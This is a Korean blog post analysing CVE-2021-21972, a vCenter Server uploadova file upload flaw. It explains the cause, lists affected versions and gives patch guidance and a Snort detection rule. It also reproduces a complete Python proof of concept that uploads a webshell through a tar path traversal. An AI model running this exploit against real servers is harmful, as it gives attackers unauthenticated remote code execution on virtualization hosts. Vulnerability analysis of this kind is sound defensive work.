1. 취약점
- vSphere Client(HTML5)에는 vCenter Server의 업로드 관련 플러그인(uploadova)의 파일 업로드 취약점
※ 파일 업로드 후 원격 명령 실행으로 이어질 수 있음
영향받는 버전
- VMware vCenter Server 7.0 U1c 이전 7.x 버전
- VMware vCenter Server 6.7 U3I 이전 6.7 버전
- VMware vCenter Server 6.5 U3n 이전 6.5 버전
- VMware Cloud Foundation (vCenter 서버) 4.2 이전 4.x 버전
- VMware Cloud Foundation (vCenter 서버) 3.10.1.2 이전 3.x 버전
2. 분석
2.1 원인
- 공개된 PoC 확인 시 업로드 관련 플러그인(uploadova)을 이용해 악성 파일 업로드 후 원격 명령 입력을 시도
- uploadova 엔드포인트의 경로인 /ui/vropspluginui/rest/services/* 는 인증 없이 접근이 가능
- [사진 3]의 코드는 다음과 같은 문제를 유발시킴
① uploadova 플로그인은 tar 압축 파일만 업로드 가능한 플러그인 > 압축 파일 확장자(.tar) 이름을 필터링되지 않음
② 아카이브 파일을 받아 /tmp/unicorn_ova_dir 경로에 해당 아카이브 파일을 열어 파일을 생성 > 생성되는 아카이브 내부의 파일 이름에 대한 검증이 없음
∴ 악성 파일을(ex. webshell) 업로드 후 원격 명령어 입력이 가능
2.2 PoC
- 공개된 PoC를 확인 시 다음을 알 수 있음
① POST 메소드 사용
② /ui/vropspluginui/rest/services/uploadova URL 요청
③ .tar 확장자 파일을 업로드 시도
※ 대상 서버가 Windows인 경우
- .jsp 형식의 웹 쉘 등 악의적인 파일을
- C:\ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\ 에 업로드 (인증 없이 접근 가능)
- 파일에 접근 및 원격 코드 실행
#!/usr/bin/python3
import argparse
import requests
import tarfile
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
ENDPOINT = '/ui/vropspluginui/rest/services/uploadova'
def check(ip):
r = requests.get('https://' + ip + ENDPOINT, verify=False, timeout=30)
if r.status_code == 405:
print('[+] ' + ip + ' vulnerable to CVE-2021-21972!')
return True
else:
print('[-] ' + ip + ' not vulnerable to CVE-2021-21972. Response code: ' + str(r.status_code) + '.')
return False
def make_traversal_path(path, level=5, os="unix"):
if os == "win":
traversal = ".." + "\\"
fullpath = traversal*level + path
return fullpath.replace('/', '\\').replace('\\\\', '\\')
else:
traversal = ".." + "/"
fullpath = traversal*level + path
return fullpath.replace('\\', '/').replace('//', '/')
def archive(file, path, os):
tarf = tarfile.open('exploit.tar', 'w')
fullpath = make_traversal_path(path, level=5, os=os)
print('[+] Adding ' + file + ' as ' + fullpath + ' to archive')
tarf.add(file, fullpath)
tarf.close()
print('[+] Wrote ' + file + ' to exploit.tar on local filesystem')
def post(ip):
r = requests.post('https://' + ip + ENDPOINT, files={'uploadFile':open('exploit.tar', 'rb')}, verify=False, timeout=30)
if r.status_code == 200 and r.text == 'SUCCESS':
print('[+] File uploaded successfully')
else:
print('[-] File failed to upload the archive. The service may not have permissions for the specified path')
print('[-] Status Code: ' + str(r.status_code) + ', Response:\n' + r.text)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
parser.add_argument('-f', '--file', help='The file to tar')
parser.add_argument('-p', '--path', help='The path to extract the file to on target')
parser.add_argument('-o', '--operating-system', help='The operating system of the VCSA server')
args = parser.parse_args()
vulnerable = check(args.target)
if vulnerable and (args.file and args.path and args.operating_system):
archive(args.file, args.path, args.operating_system)
post(args.target)
3. 대응방안
3.1 서버측면
① 최신 버전의 업데이트 적용
- VMware vCenter Server 7.0 U1c
- VMware vCenter Server 6.7 U3I
- VMware vCenter Server 6.5 U3n
- VMware Cloud Foundation (vCenter 서버) 4.2
- VMware Cloud Foundation (vCenter 서버) 3.10.1.2
3.2 네트워크 측면
① 보안장비에 취약점을 이용한 공격 시도를 탐지할 수 있는 정책 적용
alert tcp any any -> any any (msg:"VMware vCenter Server Uploadova (CVE-2021-21972)"; flow:established,from_client; content:"POST"; depth:4; content:"ui/vropspluginui/rest/services/uploadova"; distance:1;)
4. 참고
- https://nvd.nist.gov/vuln/detail/CVE-2021-21972
- https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-21972
- https://www.shodan.io/search?query=http.title:%22ID_VC_Welcome%22
- https://reconshell.com/cve-2021-21972-vcenter-rce-vulnerability-analysis/
- https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35925
- https://kb.vmware.com/s/article/82374
- https://www.vmware.com/security/advisories/VMSA-2021-0002.html
- https://swarm.ptsecurity.com/unauth-rce-vmware/
- https://github.com/horizon3ai/CVE-2021-21972/blob/master/CVE-2021-21972.py
'취약점 > File Up&Download, Inclusion' 카테고리의 다른 글
| Apache Struts 파일 업로드 취약점 (CVE-2023-50164) (1) | 2023.12.18 |
|---|---|
| 이니텍 INISAFE CrossWeb EX V3 파일 다운로드 취약점 (0) | 2023.03.31 |
| File Upload 취약점_webshell 추가 (0) | 2022.10.12 |
| File Inclusion (DVWA실습) (0) | 2022.10.12 |
| File Upload 취약점_webshell (0) | 2022.10.10 |